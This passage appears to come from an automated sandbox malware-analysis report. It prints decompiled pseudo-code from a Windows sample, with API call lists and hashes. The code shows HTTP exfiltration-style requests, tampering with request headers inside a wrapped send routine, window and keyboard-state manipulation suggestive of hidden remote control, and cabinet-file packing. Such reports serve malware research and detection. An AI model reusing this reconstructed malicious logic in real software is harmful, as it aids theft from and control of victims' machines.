    					return 0;
    				}
    				_t53 = InternetOpenA( *0x423dd4, 0, 0, 0, 0);
    				_v44 = _t53;
    				if(_t53 == 0) {
    					L24:
    					E00411CFE(_v36);
    					E00411CFE(_v32);
    					goto L25;
    				}
    				_t56 = InternetConnectA(_t53, _v36, _v24, 0, 0, 3, 0, 0);
    				_v20 = _t56;
    				if(_t56 == 0) {
    					L23:
    					InternetCloseHandle(_v44);
    					goto L24;
    				}
    				_t58 =  *_t106;
    				_t99 = "POST";
    				if( *((char*)(_t58 + 0x18)) != 1) {
    					_t99 = "GET";
    				}
    				_t97 = HttpOpenRequestA(_v20, _t99, _v32, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v22 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    				_v16 = _t97;
    				if(_t97 == 0) {
    					L22:
    					InternetCloseHandle(_v20);
    					goto L23;
    				} else {
    					E0041CCFF(_t99,  &_v552);
    					_t63 = 0xe;
    					E00419861(_t63,  &_v64);
    					_t66 =  *_a4;
    					if( *((intOrPtr*)( *_a4 + 0x20)) > 0) {
    						_t94 = E00412AC2( &_v12,  &_v64,  *((intOrPtr*)(_t66 + 0x1c)));
    						_t114 = _t114 + 0xc;
    						if(_t94 > 0) {
    							HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
    							E00411CFE(_v12);
    						}
    					}
    					_t67 = 0xf;
    					E00419861(_t67,  &_v56);
    					_v40 = E0041284D( &_v548);
    					_t109 = E00411CCE(2 + _t69 * 6);
    					if(_t109 == 0) {
    						_t109 = 0;
    					} else {
    						E00416A92(_t109,  &_v548, _v40);
    						_t97 = _v16;
    					}
    					if(_t109 != 0 && E00412AC2( &_v12,  &_v56, _t109) > 0) {
    						HttpAddRequestHeadersA(_t97, _v12, 0xffffffff, 0xa0000000);
    						E00411CFE(_v12);
    					}
    					E00411CFE(_t109);
    					_t110 = _a4;
    					if(HttpSendRequestA(_t97, 0, 0,  *( *_t110 + 0x24),  *( *_t110 + 0x28)) != 1) {
    						L21:
    						InternetCloseHandle(_t97);
    						goto L22;
    					} else {
    						_v12 = 4;
    						_a4 = 0;
    						if(HttpQueryInfoA(_t97, 0x20000013,  &_a4,  &_v12, 0) != 1 || _a4 != 0xc8) {
    							goto L21;
    						} else {
    							if(E00413E34( &_v12, _t97) != 0) {
    								E00411CFE(_t80);
    							}
    							E00411CFE(_v36);
    							E00411CFE(_v32);
    							 *(_t110 + 8) = _v16;
    							goto L25;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00416767: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00416796
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 0041BF8D
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0041BFAB
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 0041BFF6
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041C04B
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0041C0BF
    • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0041C0E1
    • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 0041C105
    • InternetCloseHandle.WININET(00000000), ref: 0041C145
    • InternetCloseHandle.WININET(?), ref: 0041C14E
      • Part of subcall function 00413E34: InternetQueryOptionA.WININET(-00422ABC,00000022,00000000,?), ref: 00413E48
      • Part of subcall function 00413E34: GetLastError.KERNEL32 ref: 00413E52
      • Part of subcall function 00413E34: InternetQueryOptionA.WININET(00000022,00000022,00000000,?), ref: 00413E72
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • InternetCloseHandle.WININET(?), ref: 0041C157
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 1023423486-2753618334
    • Opcode ID: 5b39da0a87764aacb01a3214d3de9b7f8f2d9f413472be06776d42dd61207aad
    • Instruction ID: 69841bee5363271bd62e5e2e84413da6c62377a3aefec334177c663af5307683
    • Opcode Fuzzy Hash: 5b39da0a87764aacb01a3214d3de9b7f8f2d9f413472be06776d42dd61207aad
    • Instruction Fuzzy Hash: 04518371940129BBCB21AFA1CD85EDF7F79EF09354F104426F505B6172D7389A80CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0040BD4D(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
    				struct tagRECT _v20;
    				signed int _v24;
    				signed int _v28;
    				signed short _t37;
    				int _t46;
    				BYTE* _t47;
    				signed short _t51;
    				int _t63;
    				int _t64;
    				unsigned int _t65;
    				struct HMENU__* _t70;
    				struct HMENU__* _t74;
    				void* _t78;
    
    				_t65 = __ecx;
    				_t37 = _a8;
    				_t78 = _t37 - 0xfffffffd;
    				if(_t78 == 0) {
    					SetKeyboardState( *0x422928);
    					L23:
    					SetEvent( *0x422924);
    					return 0;
    				}
    				if(_t78 <= 0 || _t37 > 0xffffffff) {
    					_v20.top = _t37 >> 0x10;
    					_v20.right = _t65 & 0x0000ffff;
    					_v20.left = _t37 & 0x0000ffff;
    					_v20.bottom = _t65 >> 0x10;
    					E004066DB( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x422918, _a4, 0);
    					goto L23;
    				} else {
    					_t70 = GetMenu(_a4);
    					if(_t70 == 0) {
    						goto L23;
    					}
    					_v24 = _v24 | 0xffffffff;
    					_t46 = GetMenuItemCount(_t70);
    					_t63 = 0;
    					_v28 = _t46;
    					if(_t46 <= 0) {
    						L8:
    						_t47 =  *0x422928; // 0x0
    						_push(_t47[0x104]);
    						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
    						if(_t64 == 0xffffffff) {
    							goto L23;
    						}
    						_v28 = GetMenuState(_t70, _t64, 0x400);
    						if(_v24 != _t64) {
    							EndMenu();
    						}
    						HiliteMenuItem(_a4, _t70, _t64, 0x480);
    						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
    							if((_v28 & 0x00000010) == 0) {
    								if((_v28 & 0x00000800) == 0) {
    									_t51 = GetMenuItemID(_t70, _t64);
    									if(_t51 == 0xffffffff) {
    										goto L23;
    									}
    									L20:
    									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
    									goto L23;
    								}
    								_t51 = 0;
    								goto L20;
    							}
    							_t74 = GetSubMenu(_t70, _t64);
    							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
    								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
    							}
    						}
    						goto L23;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						if(GetMenuState(_t70, _t63, 0x400) < 0) {
    							HiliteMenuItem(_a4, _t70, _t63, 0x400);
    							_v24 = _t63;
    						}
    						_t63 = _t63 + 1;
    					} while (_t63 < _v28);
    					goto L8;
    				}
    			}

    APIs
    • GetMenu.USER32(?), ref: 0040BD77
    • GetMenuItemCount.USER32 ref: 0040BD8D
    • GetMenuState.USER32 ref: 0040BDA5
    • HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 0040BDB5
    • MenuItemFromPoint.USER32(?,00000000,?,?), ref: 0040BDDB
    • GetMenuState.USER32 ref: 0040BDEF
    • EndMenu.USER32 ref: 0040BDFF
    • HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 0040BE0F
    • GetSubMenu.USER32 ref: 0040BE33
    • GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 0040BE4D
    • TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0040BE6E
    • GetMenuItemID.USER32(00000000,00000000), ref: 0040BE86
    • SendMessageW.USER32(?,00000111,?,00000000), ref: 0040BE9F
    • SetKeyboardState.USER32 ref: 0040BEDE
    • SetEvent.KERNEL32 ref: 0040BEEA
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
    • String ID:
    • API String ID: 751066993-0
    • Opcode ID: d6c3eb12cd40d97ec6dc1a2f8b9c68d49b86bf915e96cf6cc3d85c3d68eb353d
    • Instruction ID: 693e90f1b73ffe5754aca1f3c3e1b7ba975239454486425e04991a42f8622c9e
    • Opcode Fuzzy Hash: d6c3eb12cd40d97ec6dc1a2f8b9c68d49b86bf915e96cf6cc3d85c3d68eb353d
    • Instruction Fuzzy Hash: 1C418770100305ABD7119F25DD88ABF7AA8EB85764F04463AFAA5B12F0C7388D459BED
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004159E8() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    				intOrPtr _t18;
    
    				if( *0x423a2c != 0) {
    					L9:
    					 *0x423a2c =  *0x423a2c + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x423a28 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x423054 = GetProcAddress(_t2, "FCICreate");
    						 *0x423a18 = GetProcAddress( *0x423a28, "FCIAddFile");
    						 *0x422c4c = GetProcAddress( *0x423a28, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x423a28, "FCIDestroy");
    						 *0x423a20 = _t7;
    						if( *0x423054 == 0 ||  *0x423a18 == 0) {
    							L7:
    							FreeLibrary( *0x423a28);
    							goto L8;
    						} else {
    							_t18 =  *0x422c4c; // 0x0
    							if(_t18 == 0 || _t7 == 0) {
    								goto L7;
    							} else {
    								_t9 = HeapCreate(0, 0x80000, 0);
    								 *0x422c48 = _t9;
    								if(_t9 != 0) {
    									goto L9;
    								} else {
    									goto L7;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,00415ACF,?,00415CEB,?,?,00000000,?), ref: 004159FC
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00415A1C
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 00415A2E
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00415A40
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 00415A52
    • HeapCreate.KERNEL32(00000000,00080000,00000000,00415CEB,?,?,00000000,?), ref: 00415A7D
    • FreeLibrary.KERNEL32(00415CEB,?,?,00000000,?), ref: 00415A92
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: c1415b4bfafd8665eeda592417042593af9440ed0628c2eb29a1526b59e624d6
    • Instruction ID: 505cd38ddb04d1cb2d12e237c462345e0bb063a75df8d865628f23ac7617d8d9
    • Opcode Fuzzy Hash: c1415b4bfafd8665eeda592417042593af9440ed0628c2eb29a1526b59e624d6
    • Instruction Fuzzy Hash: F511E830B90A10FACB319F65FD4859A7FB8A6887633A40637E444A3674DA7D46828F5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040FE2A(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _v44;
    				void* _v60;
    				signed int _v72;
    				char _v76;
    				signed int _v80;
    				signed int _v84;
    				signed char _v88;
    				signed int _v92;
    				void* _v96;
    				intOrPtr _v104;
    				signed int _v108;
    				void* _v112;
    				void* _v132;
    				void* __esi;
    				signed int _t111;
    				signed int _t113;
    				signed char _t114;
    				signed int _t115;
    				void* _t117;
    				signed char _t121;
    				signed int _t122;
    				signed int _t125;
    				signed int _t128;
    				signed char _t130;
    				signed char _t136;
    				intOrPtr _t149;
    				void* _t165;
    				signed char _t166;
    				void* _t172;
    				intOrPtr _t178;
    				signed int _t184;
    				void* _t186;
    				void* _t188;
    				signed int _t202;
    				signed int _t203;
    				signed int _t205;
    				void* _t207;
    
    				_t207 = (_t205 & 0xfffffff8) - 0x5c;
    				if(E0041CB59() == 0 || _a8 == 0 || _a12 <= 0) {
    					L9:
    					_t111 =  *0x422acc(_a4, _a8, _a12);
    					goto L10;
    				} else {
    					EnterCriticalSection(0x422adc);
    					_t192 = _a4;
    					_t184 = E0040EEAE(_a4);
    					_v84 = _t184;
    					if(_t184 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x422adc);
    						goto L9;
    					}
    					_t186 = _t184 * 0x38 +  *0x422af8;
    					if( *(_t186 + 0x20) > 0) {
    						L29:
    						_t113 =  *(_t186 + 0x24);
    						_t188 =  *(_t186 + 0x20) - _t113;
    						LeaveCriticalSection(0x422adc);
    						_t195 = _a4;
    						_t114 =  *0x422acc(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
    						_v88 = _t114;
    						__eflags = _t114 - 0xffffffff;
    						if(_t114 != 0xffffffff) {
    							EnterCriticalSection(0x422adc);
    							_t115 = E0040EEAE(_t195);
    							__eflags = _t115 - 0xffffffff;
    							if(_t115 != 0xffffffff) {
    								_t166 = _v88;
    								_t117 = _t115 * 0x38 +  *0x422af8;
    								__eflags = _t166 - _t188;
    								if(_t166 != _t188) {
    									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
    									_t92 = _t117 + 0x28;
    									 *_t92 =  *(_t117 + 0x28) - 1;
    									__eflags =  *_t92;
    									_v88 = 1;
    								} else {
    									_t88 = _t117 + 0x1c; // -4336348
    									_v88 =  *(_t117 + 0x28);
    									E00411DB1(E00411CFE( *_t88), _t88, 0, 0x10);
    								}
    							} else {
    								_v88 = _v88 | _t115;
    								 *0x422ad8(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x422adc);
    						}
    						L36:
    						_t111 = _v88;
    						L10:
    						return _t111;
    					}
    					if( *(_t186 + 8) > 0) {
    						L38:
    						LeaveCriticalSection(0x422adc);
    						_t197 = _a4;
    						_t121 =  *0x422acc(_a4, _a8, _a12);
    						_v88 = _t121;
    						__eflags = _t121 - 0xffffffff;
    						if(_t121 != 0xffffffff) {
    							EnterCriticalSection(0x422adc);
    							_t122 = E0040EEAE(_t197);
    							__eflags = _t122 - 0xffffffff;
    							if(_t122 != 0xffffffff) {
    								_t172 = _t122 * 0x38 +  *0x422af8;
    								_t178 =  *((intOrPtr*)(_t172 + 8));
    								__eflags = _v88 - _t178;
    								if(_v88 > _t178) {
    									E0040EF6C(_t122);
    								} else {
    									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
    								}
    							} else {
    								_v88 = _v88 | _t122;
    								 *0x422ad8(0xffffe890, 8);
    							}
    							LeaveCriticalSection(0x422adc);
    						}
    						goto L36;
    					}
    					_t125 = E0040F3A2( &_v76, _t192, _a8, _a12);
    					_v92 = _t125;
    					if(_t125 != 0xffffffff) {
    						__eflags = _v72;
    						if(_v72 == 0) {
    							L37:
    							E0041BED2( &_v76);
    							_t128 = _v80 + _a12;
    							__eflags = _t128;
    							 *(_t186 + 8) = _t128;
    							goto L38;
    						}
    						_t130 = E0041B5A4( &_v76);
    						_v88 = _t130;
    						__eflags = _t130 & 0x00000001;
    						if((_t130 & 0x00000001) == 0) {
    							_v92 = 0;
    							_v88 = 0;
    							__eflags = _t130 & 0x00000002;
    							if(__eflags != 0) {
    								_t203 = E00411D51(__eflags, _a8, _a12);
    								 *(_t207 + 0x10) = _t203;
    								__eflags = _t203;
    								if(_t203 != 0) {
    									E0041BF3C( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
    									E00411CFE( *(_t186 + 0x14));
    									E00411CFE( *((intOrPtr*)(_t186 + 4)));
    									_t149 = E0041215C(_v76, _v80);
    									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
    									_t38 = _t186 + 0x18;
    									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
    									__eflags =  *_t38;
    									 *((intOrPtr*)(_t186 + 4)) = _t149;
    									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
    									 *((intOrPtr*)(_t186 + 0x10)) =  *((intOrPtr*)(_t207 + 0x68));
    									 *((intOrPtr*)(_t207 + 0x14)) = E00416C30(E00416C30(E00416CAC(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
    								} else {
    									E0041BF3C( *((intOrPtr*)(_t207 + 0x60)), _v20);
    								}
    							}
    							__eflags = _v84 & 0x00000004;
    							if((_v84 & 0x00000004) == 0) {
    								L27:
    								__eflags = _v92;
    								if(_v92 == 0) {
    									goto L37;
    								}
    								E0041BED2( &_v76);
    								_t70 = _t186 + 0x24;
    								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
    								__eflags =  *_t70;
    								 *(_t186 + 8) = _v80;
    								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
    								 *(_t186 + 0x20) = _v88;
    								 *(_t186 + 0x28) = _a12;
    								goto L29;
    							}
    							_t202 = _v92;
    							__eflags = _t202;
    							if(__eflags != 0) {
    								_t136 = _v88;
    							} else {
    								_t202 = _a8;
    								_t136 = _a12;
    							}
    							_v84 = _t136;
    							_v104 = E0040F682(_v84, __eflags, _t202, _v40, _v36,  &_v92);
    							E00411CFE( *((intOrPtr*)(_t207 + 0x44)));
    							__eflags = _v108;
    							if(_v108 != 0) {
    								__eflags = _t202 - _a8;
    								if(_t202 != _a8) {
    									E00411CFE(_t202);
    								}
    							} else {
    								__eflags = _t202 - _a8;
    								if(_t202 == _a8) {
    									goto L37;
    								}
    								_v92 = _t202;
    								_v88 = _v84;
    							}
    							goto L27;
    						} else {
    							E0041BED2( &_v76);
    							LeaveCriticalSection(0x422adc);
    							_t111 =  *0x422ad8(0xffffe8a3, 0) | 0xffffffff;
    							goto L10;
    						}
    					} else {
    						E0040EF6C(_v84);
    						E0041BED2( &_v76);
    						goto L8;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • EnterCriticalSection.KERNEL32(00422ADC), ref: 0040FE51
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FEAF
    • LeaveCriticalSection.KERNEL32(00422ADC,?), ref: 0040FEF6
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 00410061
    • EnterCriticalSection.KERNEL32(00422ADC), ref: 00410080
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 004100E2
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 0041010B
    • EnterCriticalSection.KERNEL32(00422ADC), ref: 0041012A
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 00410172
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
    • String ID: Accept-Encoding$If-Modified-Since$identity
    • API String ID: 3286975823-3034467039
    • Opcode ID: 7a0a699a2deab50dfed9a92214c090df2856fe2a5acf9c719241a78c50535088
    • Instruction ID: 90a8d76865297b5f9fb884ba2da475921b80b43c4810e8f45525a72c889eb904
    • Opcode Fuzzy Hash: 7a0a699a2deab50dfed9a92214c090df2856fe2a5acf9c719241a78c50535088
    • Instruction Fuzzy Hash: A5A1A071504302AFC720DF24DD45A8EBBA0FF48324F104A2EF954A36A1D778E995CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040BA86(void** __eax, char _a4) {
    				void* __esi;
    				void* _t15;
    				void* _t16;
    				long _t17;
    				void* _t18;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				struct HDC__* _t23;
    				void* _t24;
    				void* _t25;
    				void** _t41;
    
    				_t41 = __eax;
    				_t1 =  &(_t41[7]); // 0x0
    				_t15 =  *_t1;
    				if(_t15 != 0) {
    					DeleteObject(_t15);
    				}
    				_t2 =  &(_t41[3]); // 0x0
    				_t16 =  *_t2;
    				if(_t16 != 0) {
    					CloseHandle(_t16);
    				}
    				_t3 =  &(_t41[1]); // 0x0
    				_t17 =  *_t3;
    				if(_t17 != 0xffffffff) {
    					TlsFree(_t17);
    				}
    				_t4 =  &(_t41[5]); // 0x0
    				_t18 =  *_t4;
    				if(_t18 != 0) {
    					CloseHandle(_t18);
    				}
    				_t5 =  &(_t41[4]); // 0x0
    				_t19 =  *_t5;
    				if(_t19 != 0) {
    					UnmapViewOfFile(_t19);
    				}
    				_t20 =  *_t41;
    				if(_t20 != 0) {
    					_t20 = CloseHandle(_t20);
    				}
    				if(_a4 != 0) {
    					_t7 =  &(_t41[0x56]); // 0x0
    					_t21 =  *_t7;
    					if(_t21 != 0) {
    						_t8 =  &(_t41[0x55]); // 0x0
    						SelectObject( *_t8, _t21);
    					}
    					_t9 =  &(_t41[0x57]); // 0x0
    					_t22 =  *_t9;
    					if(_t22 != 0) {
    						DeleteObject(_t22);
    					}
    					_t10 =  &(_t41[0x55]); // 0x0
    					_t23 =  *_t10;
    					if(_t23 != 0) {
    						DeleteDC(_t23);
    					}
    					_t11 =  &(_t41[0x58]); // 0x0
    					_t24 =  *_t11;
    					if(_t24 != 0) {
    						CloseHandle(_t24);
    					}
    					_t12 =  &(_t41[0x60]); // 0x0
    					_t25 =  *_t12;
    					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
    						_t13 =  &(_t41[0x62]); // 0x0
    						PostThreadMessageW( *_t13, 0x12, 0, 0);
    					}
    					_t20 = E0041370D( &(_t41[0x5f]));
    				}
    				return _t20;
    			}

    APIs
    • DeleteObject.GDI32(00000000), ref: 0040BA99
    • CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAA9
    • TlsFree.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAB4
    • CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAC2
    • UnmapViewOfFile.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BACC
    • CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040BAD9
    • SelectObject.GDI32(00000000,00000000), ref: 0040BAF3
    • DeleteObject.GDI32(00000000), ref: 0040BB04
    • DeleteDC.GDI32(00000000), ref: 0040BB11
    • CloseHandle.KERNEL32(00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0040BB22
    • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0040BB31
    • PostThreadMessageW.USER32 ref: 0040BB4A
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
    • String ID:
    • API String ID: 1699860549-0
    • Opcode ID: d83dc3b15fcd31eb2ecd5736054aa2e090a8da67c7980f510d32ecdbe90ff0a9
    • Instruction ID: 715bfd64a48d163af5742ae47fc03ca5dd3acce316aca4abbd0a94a37181df7f
    • Opcode Fuzzy Hash: d83dc3b15fcd31eb2ecd5736054aa2e090a8da67c7980f510d32ecdbe90ff0a9
    • Instruction Fuzzy Hash: EE21CB707007019BD620AB799D88F97B3ECAF44741F444929B956F36E0DB78E8408A6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406EBC(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
    				char _v5;
    				long _v12;
    				signed char _v16;
    				struct tagRECT _v32;
    				char _v140;
    				void* __ebx;
    				void* __esi;
    				signed char _t47;
    				intOrPtr _t52;
    				void* _t85;
    				RECT* _t89;
    
    				_t89 = __edi;
    				_t86 = __ecx;
    				_t85 = __eax;
    				_t47 = E0040B7B4(_a4) & 0x0000ffff;
    				_v16 = _t47;
    				if((_t47 & 0x00000001) != 0) {
    					L16:
    					return 1;
    				}
    				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
    					_v5 = 0;
    				} else {
    					_t86 =  &_v140;
    					E0041635B( &_v140, _t85 + 0x3c, _v12, _t85 + 0x50, 2);
    					_v5 = E004154E1( &_v140);
    				}
    				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
    					L8:
    					if(E00406D5A(_t85, _t86) == 0) {
    						L14:
    						_t52 = _a8;
    						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
    							IntersectRect( &_v32, _t52 + 4, _t89);
    							FillRect( *(_t85 + 0x154),  &_v32, 6);
    							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
    						}
    						goto L16;
    					}
    					E00411D3A( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
    					ResetEvent( *(_t85 + 0xc));
    					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
    						goto L14;
    					}
    					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
    						TerminateProcess( *(_t85 + 0x17c), 0);
    						E0041370D(_t85 + 0x17c);
    						goto L14;
    					}
    					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
    						goto L14;
    					}
    					return _v5;
    				} else {
    					ResetEvent( *(_t85 + 0xc));
    					_t86 = _t89->left & 0x0000ffff;
    					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
    						goto L8;
    					} else {
    						goto L16;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0040B7B4: GetClassNameW.USER32 ref: 0040B7CF
    • GetWindowThreadProcessId.USER32(?,?), ref: 00406EE6
    • ResetEvent.KERNEL32(00000010), ref: 00406F35
    • PostMessageW.USER32(?,?,?,00000010), ref: 00406F58
    • WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00406F67
    • ResetEvent.KERNEL32(?,?,?,00000010), ref: 00406F92
    • PostThreadMessageW.USER32 ref: 00406FA2
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 00406FB4
      • Part of subcall function 0041635B: StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,00020016), ref: 00416401
      • Part of subcall function 004154E1: OpenMutexW.KERNEL32(00100000,00000000,00000000,0041D386,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 004154EC
      • Part of subcall function 004154E1: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004154F7
    • TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00406FD9
      • Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0041371C
      • Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 00413725
    • IntersectRect.USER32 ref: 00406FF9
    • FillRect.USER32 ref: 0040700B
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0040701F
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
    • String ID:
    • API String ID: 2453266691-0
    • Opcode ID: 4930d6bd9a8574288e3c7073299025b2ec30995bc4c6f14af17c16d72b1dd6ba
    • Instruction ID: 210868998667805254481752e6a8419ca32da207a7284421fbc5583cd24233aa
    • Opcode Fuzzy Hash: 4930d6bd9a8574288e3c7073299025b2ec30995bc4c6f14af17c16d72b1dd6ba
    • Instruction Fuzzy Hash: 70418F31904205ABEF109F60DD45FEA7BB8AF04304F0480BAFD45EA1A2DB39D965DB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E0041A117(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				struct HWND__* _v8;
    				char _v12;
    				struct HWND__* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
